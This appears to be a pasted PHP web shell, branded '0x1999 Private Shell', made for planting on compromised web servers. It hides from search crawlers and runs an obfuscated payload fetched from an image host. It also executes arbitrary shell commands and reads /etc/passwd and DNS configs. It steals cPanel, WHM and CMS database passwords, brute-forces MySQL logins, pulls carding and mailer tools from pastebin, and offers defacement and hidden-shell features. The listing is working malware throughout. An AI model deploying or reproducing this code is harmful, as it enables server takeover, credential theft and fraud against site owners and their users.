

Mar 23rd, 2019
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  1. <?php
  3. // 0x1999 Private Shell
  4. // Use your own risk
  5. // Hard coded by 0x1999
  7. @session_start();
  8. @ini_set('max_execution_time', 0);
  9. @ini_set('output_buffering', 0);
  10. @set_time_limit(0);
  11. @date_default_timezone_set('Asia/Jakarta');
  12. //=============================[ START BOT LOCKED ]=============================//
  13. if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {header('HTTP/1.0 404 Not Found');exit;}
  14. //=============================[ END BOT LOCKED ]=============================//
  16. //=============================[ START CONFIGURATION ]=============================//
  17. $shell_name = '0x Shell';
  18. $shell_slogan = 'The Next JanCox Shell';
  19. $shell_version = '1.1';
  20. $shell_bypass_security = '0';
  21. $show_error = "0";
  22. $password = md5("kontol");
  23. //=============================[ END CONFIGURATION ]=============================//
  24. function valid($sc) {
  25. $tmpfname = tempnam("/tmp", "valid");
  26. $handle = fopen($tmpfname, "w+");
  27. fwrite($handle, "<?php\n" . $sc);
  28. fclose($handle);
  29. include $tmpfname;
  30. unlink($tmpfname);
  31. return get_defined_vars();
  32. }
  33. $ch = curl_init("https://image.ibb.co/ct3Zrn/indonesia_icon.png");
  34. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  35. $data = curl_exec($ch);
  36. curl_close($ch);
  37. $image = 'sub'.'s'.'tr';
  38. $valid = "g"."zi"."nf".strrev($image("metal",1));
  39. extract(valid($valid($image($data,1934))));
  41. function login_shell() {
  42. echo '<!DOCTYPE HTML><html><head><title>0xShell - Private</title><style type="text/css">html { margin: 20px auto; background: #000000; color: green; text-align: center;} header { color: green; margin: 10px auto; } input[type=password] { width: 250px; height: 25px; color: red; background: transparent; border: 1px dotted green; margin-left: 20px; text-align: center; } </style> </head> <center> <header> <pre>ndonesian Code Party - Jatim4u</pre> </header> <form method="post"> <input type="password" name="password"> </form>
  43. ';exit;}
  44. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  45. if(empty($password) || (isset($_POST['password']) && (md5($_POST['password']) == $password)))
  46. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  47. else
  48. login_shell();
  50. //=============================[ START INIT PROC ]=============================//
  52. if($show_error == "0"){
  53. @error_reporting(0);
  54. @error_log(0);
  55. @ini_set('error_log',NULL);
  56. @ini_set('log_errors',0);
  57. @ini_set('display_errors', 0);
  58. } else {
  59. ini_set('display_errors', 1);
  60. ini_set('display_startup_errors', 1);
  61. error_reporting(E_ALL);
  62. }
  63. if (isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  64. @ob_clean();
  65. $file = $_GET['file'];
  66. header('Content-Description: File Transfer');
  67. header('Content-Type: application/octet-stream');
  68. header('Content-Disposition: attachment; filename="' . basename($file) . '"');
  69. header('Expires: 0');
  70. header('Cache-Control: must-revalidate');
  71. header('Pragma: public');
  72. header('Content-Length: ' . filesize($file));
  73. readfile($file);
  74. exit;
  75. }
  76. if(preg_match("#public_html#", getcwd())){
  77. $server_type = "public_html";
  78. } elseif(preg_match("#vhosts#", getcwd())){
  79. $server_type = "vhosts";
  80. } else{
  81. $server_type = "unknown";
  82. }
  83. if (isset($_GET['dir']) && ($_GET['dir'] != "")) {
  84. $dir = $_GET['dir'];
  85. chdir($_GET['dir']);
  86. } else {
  87. $dir = getcwd();
  88. }
  89. if (isset($_POST['upload'])) {
  90. if (@copy($_FILES['0xfile']['tmp_name'], "$dir/" . $_FILES['0xfile']['name'] . "")) {
  91. $actx = "<font color=lime>Uploaded!</font> at <i><b>$dir/" . $_FILES['0xfile']['name'] . "</b></i>";
  92. } else {
  93. $actx = "<font color=red>failed to upload file</font>";
  94. }
  95. } else {
  96. $actx = "";
  97. }
  98. if(!function_exists('posix_getegid')) {
  99. $user = @get_current_user();
  100. $uid = @getmyuid();
  101. $gid = @getmygid();
  102. $group = "?";
  103. } else {
  104. $uid = @posix_getpwuid(posix_geteuid());
  105. $gid = @posix_getgrgid(posix_getegid());
  106. $user = $uid['name'];
  107. $uid = $uid['uid'];
  108. $group = $gid['name'];
  109. $gid = $gid['gid'];
  110. }
  117. //=============================[ END INIT PROC ]=============================//
  123. // $ext = array("v1", "v2", "v3", "wp", "WP", "blog", "client", "clients", "forum", "forums", "home", "new", "old", "site", "portal", "test", "demo", "wordpress", "joomla", "beta", "news", "main", "shop", "mage", "magento", "sites", "cms", "secure", "support", "panel", "public");
  124. // $configtype = array(
  125. // "/wp-config.php" => "Wordpress",
  126. // "/config/koneksi.php" => "Lokomedia",
  127. // "/forum/config.php" => "phpBB",
  128. // "/sites/default/settings.php" => "Drupal",
  129. // "/config/settings.inc.php" => "PrestaShop",
  130. // "/app/etc/local.xml" => "Magento",
  131. // "/admin/config.php" => "OpenCart",
  132. // "/application/config/database.php" => "Ellislab",
  133. // "/configuration.php" => "Joomla",
  134. // "/submitticket.php" => "WHMCS",
  135. // "/config.php" => "OtherConfig",
  136. // "/db.php" => "DB",
  137. // "/db.inc.php" => "DBInc",
  138. // "/database.php" => "Database",
  139. // "/includes/config.php" => "Vbulletin",
  140. // "/db/config.php" => "DBConfig",
  141. // );
  142. //end config list
  146. //start head process
  149. //end head process
  150. ?>
  151. <!DOCTYPE html>
  152. <html>
  153. <style stype="text/css">
  154. @import url(https://fonts.googleapis.com/css?family=Abel|Baumans);
  155. body { background: #101010; color: #f2f2f2; font-family: Abel; font-size: 12px; } body a { color: #3467BA; text-decoration: none; } body a:hover { text-decoration: underline; } #main_content { border: 1px solid #5C7296; overflow: hidden; width: 1000px; height: auto; padding: 15px; margin: 0 auto; background: #0A0A0A; border-radius: 6px; -moz-border-radius: 6px; -webkit-border-radius: 6px; } .enabled { color: #7ACC29; } .enabled a { color: #7ACC29; font-weight: normal; } .disabled { color: #CC0000; } .TableHeader_Name { width: 400px; padding: 0px 0px 0px 5px; height: 25px; font-family: Abel; background-color: #282828; border-top-left-radius: 4px; -moz-border-top-left-radius: 4px; -webkit-border-top-left-radius: 4px; } .TableHeader { width: 100px; height: 25px; font-family: Abel; text-align: center; background-color: #282828; } .TableHeaderoptions { padding: 0px 0px 0px 15px; width: 200px; height: 25px; font-family: Abel; background-color: #282828; border-top-right-radius: 4px; -moz-border-top-right-radius: 4px; -webkit-border-top-right-radius: 4px; } .TableLast { padding: 0px 0px 0px 15px; width: 200px; height: 25px; font-family: Abel; background-color: #282828; border-top-right-radius: 4px; -moz-border-top-right-radius: 4px; -webkit-border-top-right-radius: 4px; } .filesize { color: green; text-align: center; } .filenames a { font-weight: normal; text-decoration: none; } .filenames a:hover { text-decoration: underline; } .filetr { background-color: #080808; } .filetr:hover { background-color: #282828; } #options { font-weight: 200; font-family: Abel; margin-left: 10px; display: block; } #title { font-size: 25px; font-family: arial; display: block; padding: 15px 0px 0px 0px; } .box { padding: 10px; background-color: #292929; border: 1px solid #3467BA; height: auto; width: 970; border-radius: 6px; -moz-border-radius: 6px; -webkit-border-radius: 6px; } .sembunyi { display: none; padding: 0; margin: 0; } textarea { background-color: #010101; color: #f2f2f2; border: 1px solid #3467BA; outline: none; font-size: 11px; border-radius: 3px; -moz-border-radius: 3px; -webkit-border-radius: 3px; padding: 5px; width: 970px; height: 400px; } input[type=text], input[type=password], input[type=submit], input[type=button] { background: #010101; color: #f2f2f2; margin: 0 4px; border: 1px solid #3467BA; outline: none; font-size: 11px; border-radius: 3px; -moz-border-radius: 3px; -webkit-border-radius: 3px; font-family: Abel; font-size: 12px; } .viewfile { background: #EDECEB; color: #000000; margin: 4px 2px; padding: 8px; border-radius: 3px; -moz-border-radius: 3px; -webkit-border-radius: 3px; border: 1px solid #3467BA; } select { color: #f2f2f2; padding: 0; margin: 0; border: 1px solid #3467BA; outline: none; font-size: 11px; border-radius: 3px; -moz-border-radius: 3px; -webkit-border-radius: 3px; background: #010101; overflow: hidden; font-family: Abel; font-size: 12px; } input[type="file"] { color: #f2f2f2; padding: 0; margin: 0; border: 1px solid #3467BA; outline: none; font-size: 11px; border-radius: 3px; -moz-border-radius: 3px; -webkit-border-radius: 3px; background: #010101; overflow: hidden; font-family: Abel; font-size: 12px; } .ndelik { display: none; padding: 0; margin: 0; } form, table { /*display: inline;*/ margin: 0px; padding: 0px; }
  156. </style>
  157. <script type="text/javascript">
  158. function tukar(lama, baru) {
  159. document.getElementById(lama).style.display = 'none';
  160. document.getElementById(baru).style.display = 'block';
  161. }
  162. </script>
  163. <link href="http://vignette2.wikia.nocookie.net/regularshow/images/f/fc/Emoticones_-_Pacman.png/revision/latest?cb=20160107170905&amp;path-prefix=es" rel="icon" type="image/x-icon">
  164. <?php
  165. $ling = "http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['PHP_SELF'] . "?create";
  166. $dir = str_replace("\\", "/", $dir);
  167. $scdir = explode("/", $dir);
  168. $ds = @ini_get("disable_functions");
  169. $show_ds = (!empty($ds)) ? "<input type='text' name='searchterm' size='30'style='background-color: rgb(41, 41, 41);border: 1px solid rgb(41, 41, 41);height: 12px;color: red;width: 385px;'value='$ds'readonly/>" : "<font color=lime>NONE</font>";
  170. echo "<title>$shell_name</title>";
  172. if (isset($_GET['create'])) {
  173. function CreateTools($names, $lokasi)
  174. {
  175. if ($_GET['create'] == $names) {
  176. $a = "" . $_SERVER['SERVER_NAME'] . "";
  177. $b = dirname($_SERVER['PHP_SELF']);
  178. $c = "/0x1/" . $names . ".php";
  179. if (file_exists('0x1/' . $names . '.php')) {
  180. echo '<script type="text/javascript">alert("Done");window.location.href = "0x1/' . $names . '.php";</script> ';
  181. } else {
  182. mkdir("0x1", 0777);
  183. file_put_contents('0x1/' . $names . '.php', file_get_contents_($lokasi));
  184. echo ' <script type="text/javascript">alert("Done");window.location.href = "0x1/' . $names . '.php";</script> ';}}
  185. }
  187. CreateTools("maildump", "http://pastebin.com/raw/JLjrTs40");
  188. CreateTools("injection", "http://pastebin.com/raw/nxxL8c1f");
  189. CreateTools("promailerv2", "http://pastebin.com/raw/Rk9v6eSq");
  190. CreateTools("gamestopceker", "http://pastebin.com/raw/QSnw1JXV");
  191. CreateTools("bukapalapak", "http://pastebin.com/raw/6CB8krDi");
  192. CreateTools("tokopedia", "http://pastebin.com/dvhzWgby");
  193. CreateTools("encodedecode", "http://pastebin.com/raw/wqB3G5eZ");
  194. CreateTools("mailer", "http://pastebin.com/raw/9yu1DmJj");
  195. CreateTools("r57", "http://pastebin.com/raw/G2VEDunW");
  196. CreateTools("tokenpp", "http://pastebin.com/raw/72xgmtPL");
  197. CreateTools("extractor", "http://pastebin.com/raw/jQnMFHBL");
  198. CreateTools("bh", "http://pastebin.com/raw/3L2ESWeu");
  199. CreateTools("dhanus", "http://pastebin.com/raw/v4xGus6X");
  200. }
  202. //Start Function
  204. function permissions($file)
  205. {
  207. $perms = @fileperms($file);
  208. if (($perms & 0xC000) == 0xC000) {
  209. $info = 's';
  210. } elseif (($perms & 0xA000) == 0xA000) {
  211. $info = 'l';
  212. } elseif (($perms & 0x8000) == 0x8000) {
  213. $info = '-';
  214. } elseif (($perms & 0x6000) == 0x6000) {
  215. $info = 'b';
  216. } elseif (($perms & 0x4000) == 0x4000) {
  217. $info = 'd';
  218. } elseif (($perms & 0x2000) == 0x2000) {
  219. $info = 'c';
  220. } elseif (($perms & 0x1000) == 0x1000) {
  221. $info = 'p';
  222. } else {
  223. $info = 'u';
  224. }
  225. $info .= (($perms & 0x0100) ? 'r' : '-');
  226. $info .= (($perms & 0x0080) ? 'w' : '-');
  227. $info .= (($perms & 0x0040) ?
  228. (($perms & 0x0800) ? 's' : 'x') :
  229. (($perms & 0x0800) ? 'S' : '-'));
  230. $info .= (($perms & 0x0020) ? 'r' : '-');
  231. $info .= (($perms & 0x0010) ? 'w' : '-');
  232. $info .= (($perms & 0x0008) ?
  233. (($perms & 0x0400) ? 's' : 'x') :
  234. (($perms & 0x0400) ? 'S' : '-'));
  235. $info .= (($perms & 0x0004) ? 'r' : '-');
  236. $info .= (($perms & 0x0002) ? 'w' : '-');
  237. $info .= (($perms & 0x0001) ?
  238. (($perms & 0x0200) ? 't' : 'x') :
  239. (($perms & 0x0200) ? 'T' : '-'));
  240. return $info;
  241. }
  242. function UrlLoop($url, $type)
  243. {
  244. $urlArray = array();
  245. $ch = curl_init();
  246. curl_setopt($ch, CURLOPT_URL, $url);
  247. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  248. $result = curl_exec($ch);
  249. $regex = '|<a.*?href="(.*?)"|';
  250. preg_match_all($regex, $result, $parts);
  251. $links = $parts[1];
  252. foreach ($links as $link) {
  253. array_push($urlArray, $link);
  254. }
  255. curl_close($ch);
  256. foreach ($urlArray as $value) {
  257. $lol = "$url$value";
  258. if (preg_match("#$type#is", $lol)) {
  259. echo "$lol\r\n";
  260. }
  261. }
  262. }
  264. function file_get_contents_($sites)
  265. {
  266. $ch = curl_init($sites);
  267. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  268. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  269. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  270. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  271. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  272. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  273. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  274. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  275. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  276. $data = curl_exec($ch);
  277. curl_close($ch);
  278. return $data;
  279. }
  280. function clearspace($text)
  281. {
  282. return str_replace(" ", "_", $text);
  283. }
  284. function magicboom($text)
  285. {
  286. if (!get_magic_quotes_gpc()) {
  287. return $text;
  288. }
  289. return stripslashes($text);
  290. }
  291. function ambilKata($param, $kata1, $kata2)
  292. {
  293. if (strpos($param, $kata1) === false) {
  294. return false;
  295. }
  297. if (strpos($param, $kata2) === false) {
  298. return false;
  299. }
  301. $start = strpos($param, $kata1) + strlen($kata1);
  302. $end = strpos($param, $kata2, $start);
  303. $return = substr($param, $start, $end - $start);
  304. return $return;
  305. }
  306. function ambil_password($link)
  307. {
  308. $pass = "";
  309. $ch = curl_init();
  310. curl_setopt($ch, CURLOPT_URL, $link);
  311. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  312. $ambil = curl_exec($ch);
  313. // $ambil = file_get_contents($link);
  314. if (preg_match("/WordPress/", $ambil)) {
  315. $pass .= ambilkata($ambil, "DB_PASSWORD', '", "'") . "\n";
  316. } elseif (preg_match("/JConfig|joomla/", $ambil)) {
  317. $pass .= ambilkata($ambil, "password = '", "'") . "\n";
  318. } elseif (preg_match("/cmsmember/", $ambil)) {
  319. $pass .= ambilkata($ambil, 'dbpasswd = "', '"') . "\n";
  320. } elseif (preg_match("/Magento|Mage_Core/", $ambil)) {
  321. $pass .= ambilkata($ambil, "<password><![CDATA[", "]]></password>") . "\n";
  322. } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  323. $pass .= ambilkata($ambil, 'password = "', '"') . "\n";
  324. } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  325. $pass .= ambilkata($ambil, "'DB_PASSWORD', '", "'") . "\n";
  326. } elseif (preg_match("/client/", $ambil)) {
  327. preg_match("/password=(.*)/", $ambil, $pass1);
  328. if (preg_match('/"/', $pass1[1])) {
  329. $pass1[1] = str_replace('"', "", $pass1[1]);
  330. $pass .= $pass1[1] . "\n";
  331. }
  332. } elseif (preg_match("/cc_encryption_hash/", $ambil)) {
  333. $pass .= ambilkata($ambil, "db_password = '", "'") . "\n";
  334. }
  335. return $pass;
  336. }
  337. function w($dir, $perm)
  338. {
  339. if (!is_writable($dir)) {
  340. return "<font color=red>" . $perm . "</font>";
  341. } else {
  342. return "<font color=lime>" . $perm . "</font>";
  343. }
  344. }
  345. function cekjum($kentu)
  346. {
  348. // $it = new RecursiveIteratorIterator($kentu,RecursiveDirectoryIterator::SKIP_DOTS);
  349. $it = new RecursiveIteratorIterator
  350. (
  351. new RecursiveDirectoryIterator($kentu)
  352. );
  353. // if($it-> DirectoryIterator::isDot()){
  354. // echo "cok";
  355. // }
  357. // $index = array_search('..',$it);
  358. // if($index !== FALSE){
  359. // unset($it[$index]);
  360. // }
  362. foreach ($it as $filename) {
  363. $file = realpath(dirname($filename));
  364. if ($file == "..") {
  365. continue;
  366. }
  367. if (is_writable($filename)) {
  369. $perm = permissions($file);
  370. $perm = w($file, $perm);
  371. $permd = permissions($filename);
  372. $permd = w($filename, $permd);
  374. if (is_dir($filename)) {
  375. if (is_writable($file)) {
  376. echo "[ D ] [$perm]\t\t<a href='?dir=$file'>$file</a><font color='lime'>is writable</font><br>";
  377. }
  378. } else {
  379. if (is_writable($filename)) {
  380. echo "[ F ] [$permd]\t\t<a href='?act=edit&dir=$file&file=$filename'>$filename</a><font color='lime'>is writable</font><br>";
  381. }
  382. }
  384. }
  385. }
  386. }
  387. function exe($cmd)
  388. {
  389. if (function_exists('system')) {
  390. @ob_start();
  391. @system($cmd);
  392. $buff = @ob_get_contents();
  393. @ob_end_clean();
  394. return $buff;
  395. } elseif (function_exists('exec')) {
  396. @exec($cmd, $results);
  397. $buff = "";
  398. foreach ($results as $result) {
  399. $buff .= $result;
  400. }
  401. return $buff;
  402. } elseif (function_exists('passthru')) {
  403. @ob_start();
  404. @passthru($cmd);
  405. $buff = @ob_get_contents();
  406. @ob_end_clean();
  407. return $buff;
  408. } elseif (function_exists('shell_exec')) {
  409. $buff = @shell_exec($cmd);
  410. return $buff;
  411. }
  412. }
  414. //End Function
  416. //start bypasser
  418. // $etcpasswd = etcpasswd();
  420. if (isset($_SESSION['etcpasswd'])) {
  421. $etcpasswd = $_SESSION['etcpasswd'];
  422. } else {
  423. $etcpasswd = @file_get_contents('/etc/passwd');
  424. if (!$etcpasswd) {
  425. $etcpasswd = exe('cat /etc/passwd');
  426. }
  427. }
  428. if (isset($_SESSION['etctrueuserowners'])) {
  429. $etctrueuserowners = $_SESSION['etctrueuserowners'];
  430. } else {
  431. $etctrueuserowners = @file_get_contents('/etc/trueuserowners');
  432. if (!$etctrueuserowners) {
  433. $etctrueuserowners = exe('cat /etc/trueuserowners');
  434. }
  435. }
  436. if (isset($_SESSION['etcnamedconf'])) {
  437. $etcnamedconf = $_SESSION['etcnamedconf'];
  438. } else {
  439. $etcnamedconf = @file_get_contents('/etc/named.conf');
  440. if (!$etcnamedconf) {
  441. $etcnamedconf = exe('cat /etc/named.conf');
  442. }
  443. }
  445. // end bypasser
  447. /////////////////////////////////////
  448. if (!$_SESSION["cekown"] == "pass") {
  449. $own = @file('/etc/trueuserowners');
  450. if($own){
  451. foreach ($own as $owns) {
  452. $exp = explode(": ", $owns);
  453. $string = trim(preg_replace('/\s+/', ' ', $exp[1]));
  454. if ($string == $user) {
  455. $_SESSION["statusowner"] = "OWNER";
  456. }
  457. if ($exp[0] == $user) {
  458. $_SESSION["statusclientus"] = $exp[0];
  459. $_SESSION["statusclient"] = $exp[1];
  460. }
  462. }
  463. }
  464. $_SESSION["cekown"] = "passs";
  465. }
  467. if (isset($_SESSION["statusowner"])) {
  468. $trueowner = $_SESSION["statusowner"];
  469. $trueowner = "<font color=lime>$trueowner</font>";
  470. } else {
  471. $trueowner = "<font color=red>error</font>";
  472. }
  473. if (isset($_SESSION["statusclientus"])) {
  474. $trueuser = $_SESSION["statusclient"];
  475. $trueuser = " <font color=lime>$trueuser</font>";
  476. } else {
  477. $trueuser = "<font color=red>error</font>";
  478. }
  480. $sport = $_SERVER['SERVER_PORT'];
  481. $d0mains = @file("/etc/named.conf");
  482. $users=@file('/etc/passwd');
  484. if($d0mains){
  485. $count;
  486. foreach($d0mains as $d0main){
  487. if(@ereg("zone",$d0main)){
  488. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  489. flush();
  490. if(@strlen(trim($domains[1][0])) > 2){
  491. flush();
  492. @$count++;
  493. }
  494. }
  495. }
  496. $count2=$count/2;
  497. }
  498. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  499. echo "
  500. <body>
  501. <div id='main_content'><span id='title'><font face='Baumans'>$shell_name</font> </span><i>$shell_slogan</i><br><br><div class='box'>
  502. ";
  503. echo '
  504. <table cellspacing="0" cellpadding="0">
  505. <colgroup>
  506. <col style="width: 499px">
  507. <col style="width: 599px">
  508. </colgroup>
  509. <tr>
  510. <td nowrap>Server Name:' . php_uname() . '</td>
  511. <td align="right"><form><div class="select-style">
  512. <select onchange="if (this.value) window.open(this.value);">
  513. <option selected="selected" value=""> <i>Tools Creator </option>
  514. <option value="' . $ling . '=wso"><i>WSO 2.8.1</option>
  515. </select>
  516. <select onchange="if (this.value) window.open(this.value);">
  517. <option selected="selected" value=""> Tools Carder </option>
  518. <option value="' . $ling . '=maildump">Email Dumper</option>
  519. </select></div>
  520. <noscript><input type="submit" value="Submit"></noscript>
  521. </form></td>
  522. </tr>
  523. <tr>
  524. <td>User :<font color=lime>' . $user . '</font> (' . $uid . ') Group : <font color=lime>' . $group . '</font> (' . $gid . ') Owner : (' . $trueowner . ') UserOwner : (' . $trueuser . ')</td>
  525. <td align="right">';
  526. if ($server_type == "public_html") {
  527. $aw='/home/' . $user . '/.my.cnf';
  528. if (file_exists($aw)) {
  529. $cp = file_get_contents($aw);
  530. $cp = ambilkata($cp, 'password="', '"');
  531. echo 'Cpanel : Username <font color="lime">(</font>' . $user . '<font color="lime">)</font> Password <font color="lime">(</font>' . $cp . '<font color="lime">)</font>';
  532. }}
  533. echo '
  534. </td>
  535. </tr>
  536. <tr>
  537. <td>Server IP :<font color=lime>' . gethostbyname($_SERVER["HTTP_HOST"]) . '</font> <span class="enabled"><a href="https://www.bing.com/search?q=IP:' . gethostbyname($_SERVER["HTTP_HOST"]) . '" target="_blank">[BING]</a></span> <span class="enabled"><a href="https://centralops.net/co/domaindossier.aspx?addr=' . gethostbyname($_SERVER["HTTP_HOST"]) . '&dom_whois=true&dom_dns=true&traceroute=true&net_whois=true&svc_scan=true" target="_blank">[Dossier]</a></span> | Port : <font color=lime>' . $sport . '</font> | Your IP: <font color=lime>' . $_SERVER["REMOTE_ADDR"] . '</font></td>
  538. <td align="right">';
  539. if ($server_type == "public_html") {
  540. $aw='/home/' . $user . '/.accesshash';
  541. if (file_exists($aw)) {
  542. $whm = file_get_contents($aw);
  543. $whm = preg_replace('/\s+/', '', $whm);
  544. echo '<input type="text" size="30" value="WHM ' . $user . ':' . $whm . '">';
  545. }}
  546. echo '
  547. </td>
  548. </tr>
  549. <tr>
  550. <td>Server Type : ' . $server_type . ' | Website :<font color=lime> ' . $count2 . ' </font> Domains</td>
  551. </tr>
  552. <tr>
  553. <td>Safe Mode: ' . $sm . '</td>
  554. </tr>
  555. <tr>
  556. <td>Disable Functions:' . $show_ds . '</td>
  557. </tr>
  558. <tr>
  559. <td>Server Software: ' . $_SERVER["SERVER_SOFTWARE"] . ' <span class="enabled"><a href="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=' . $_SERVER["SERVER_SOFTWARE"] . '&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=" target="_blank">[Exploit DB]</a></span>
  560. </td>
  561. </tr>
  562. <tr>
  563. <td>Directory : ';
  564. foreach ($scdir as $c_dir => $cdir) {
  565. echo "<a href='?dir=";
  566. for ($i = 0; $i <= $c_dir; $i++) {
  567. echo $scdir[$i];
  568. if ($i != $c_dir) {
  569. echo "/";
  570. }
  571. }
  572. echo "'>$cdir</a>/";
  573. }
  574. echo "</td>
  575. <td align='right'><form method='post' enctype='multipart/form-data'><input type='file' name='0xfile'><input type='submit' value='upload' name='upload'></form></td>
  576. </tr>
  577. <tr>
  578. <td><form method='post' action='?dir=$dir&do=cmd' style='float: left;'>
  579. Command :
  580. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  581. </form><p></p>
  582. </td>
  583. <td align='right'>" . $actx . "</td>
  584. </tr>
  585. </table></div>";
  586. echo '<a href="?">Home</a> / ';
  587. echo "<a href='?dir=" . $dir . "&do=config'>Config</a> / ";
  588. echo "<a href='?dir=" . $dir . "&do=jump'>Jump</a> / ";
  589. echo "<a href='?dir=" . $dir . "&do=symlink'>Sym</a> / ";
  590. echo "<a href='?dir=" . $dir . "&do=cpanel'>Cpanel</a> / ";
  591. echo "<a href='?dir=" . $dir . "&do=symlink'>Sym</a> / ";
  592. echo "<a href='?dir=" . $dir . "&do=mass_deface'>Mass</a> / ";
  593. echo "<a href='?dir=" . $dir . "&do=mirror'>Mirror</a> / ";
  594. echo "<a href='?dir=" . $dir . "&do=cgi'>Cgi</a> / ";
  595. echo "<a href='?dir=" . $dir . "&do=bc'>BC</a> / ";
  596. echo "<a href='?dir=" . $dir . "&do=about'>About</a> / ";
  597. echo "<a href='?dir=" . $dir . "&do=serverinfo'>Server Info</a> / ";
  598. echo "<a href='?do=deleteme'>Self Remove</a> / ";
  599. echo "<a href='?dir=" . $dir . "&do=ndelikne'>Hidden Shell</a> / ";
  600. echo "<a href='?dir=" . $dir . "&do=crp'>Config ResPass</a> / ";
  601. echo "<a href='?dir=" . $dir . "&do=grabpass'>Config PassGrab</a> / ";
  602. echo "<a href='?dir=" . $dir . "&do=hek'>Deface</a> / ";
  603. echo "<a href='?dir=" . $dir . "&do=cpres'>Cpanel Reset</a> / ";
  604. echo "<a href='?dir=" . $dir . "&do=setting'>Setting</a> / ";
  605. echo "<a href='?dir=" . $dir . "&do=logout'>Log Out</a> / ";
  606. echo '<hr>';
  607. /////////////////////////////////////
  608. // if(isset($_GET['act']) && ($_GET['act'] == ''))
  611. if (isset($_GET['act']) && ($_GET['act'] == 'delete')) {
  612. $delete = unlink($_GET['file']);
  613. if ($delete) {
  614. $act = "<script>window.location='?dir=" . $dir . "';</script>";
  615. } else {
  616. $act = "<font color=red>permission denied</font>";
  617. }
  618. echo $act;
  619. } elseif (isset($_GET['act']) && ($_GET['act'] == 'delete_dir')) {
  620. function Delete($path)
  621. {
  622. $path = (substr($path, -1) == '/') ? $path : $path . '/';
  623. $dh = opendir($path);
  624. while (($item = readdir($dh)) !== false) {
  625. $item = $path . $item;
  626. if ((basename($item) == "..") || (basename($item) == ".")) {
  627. continue;
  628. }
  630. $type = filetype($item);
  631. if ($type == "dir") {
  632. Delete($item);
  633. } else {
  634. @unlink($item);
  635. }
  637. }
  638. closedir($dh);
  639. @rmdir($path);}
  640. $delete_dir = Delete($dir);
  641. $act = "<script>window.location='?dir=" . dirname($dir) . "';</script>";
  642. echo $act;
  643. } elseif (isset($_POST['do_rename'])) {
  644. $rename = rename($_POST['oldname'], "$dir/" . htmlspecialchars($_POST['rename']) . "");
  645. if ($rename) {
  646. $act = "<script>window.location='?dir=" . $dir . "';</script>";
  647. } else {
  648. $act = "<font color=red>permission denied</font>";
  649. }
  650. echo "" . $act . "<br>";
  651. } elseif (isset($_POST['dir_rename'])) {
  652. $dir_rename = rename($dir . "/" . $_POST['oldname'], "" . $dir . "/" . htmlspecialchars($_POST['fol_rename']) . "");
  653. if ($dir_rename) {
  654. $act = "<script>window.location='?dir=" . $dir . "';</script>";
  655. } else {
  656. $act = "<font color=red>permission denied</font>";
  657. }
  658. echo "" . $act . "<br>";
  659. } elseif (isset($_GET['act']) && ($_GET['act'] == 'newfolder')) {
  660. if ($_POST['new_save_folder']) {
  661. $new_folder = $dir . '/' . htmlspecialchars($_POST['newfolder']);
  662. if (!mkdir($new_folder)) {
  663. $act = "<font color=red>permission denied</font>";
  664. } else {
  665. $act = "<script>window.location='?dir=" . $dir . "';</script>";
  666. }
  667. }
  668. echo $act;
  669. } elseif (isset($_GET['act']) && ($_GET['act'] == 'view')) {
  670. if (is_file($_GET['file'])) {
  671. if (!isset($file)) {
  672. $file = magicboom($_GET['file']);
  673. }
  675. echo "Filename : <font color=lime>" . basename($_GET['file']) . "</font> [ <a href='?act=view&dir=$dir&file=" . $_GET['file'] . "'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=" . $_GET['file'] . "'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=" . $_GET['file'] . "'>rename</a> ] [ <a href='?act=download&dir=$dir&file=" . $_GET['file'] . "'>download</a> ] [ <a href='?act=delete&dir=$dir&file=" . $_GET['file'] . "'>delete</a> ]<br>";
  676. echo "<div class=\"viewfile\">";
  677. $file = wordwrap(@file_get_contents($file), "240", "\n");
  678. @highlight_string($file);
  679. echo "</div>";
  680. } elseif (is_dir($_GET['view'])) {
  681. echo showdir($dir, $prompt);
  682. }
  683. }
  685. //end act
  687. elseif (isset($_GET['do']) && ($_GET['do'] == 'cpanel')) {
  688. if ($_POST['crack']) {
  689. $usercp = explode("\r\n", $_POST['user_cp']);
  690. $passcp = explode("\r\n", $_POST['pass_cp']);
  691. $i = 0;
  692. foreach ($usercp as $ucp) {
  693. foreach ($passcp as $pcp) {
  694. if (@mysqli_connect('localhost', $ucp, $pcp)) {
  695. if ($_SESSION[$ucp] && $_SESSION[$pcp]) {
  696. } else {
  697. $_SESSION[$ucp] = "1";
  698. $_SESSION[$pcp] = "1";
  699. $i++;
  700. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  701. }
  702. }
  703. }
  704. session_unset();
  705. session_destroy();
  706. }
  707. if ($i == 0) {
  708. } else {
  709. echo "<br>Nemu " . $i . " Cpanel by <font color=lime>0x1999</font>";
  710. }
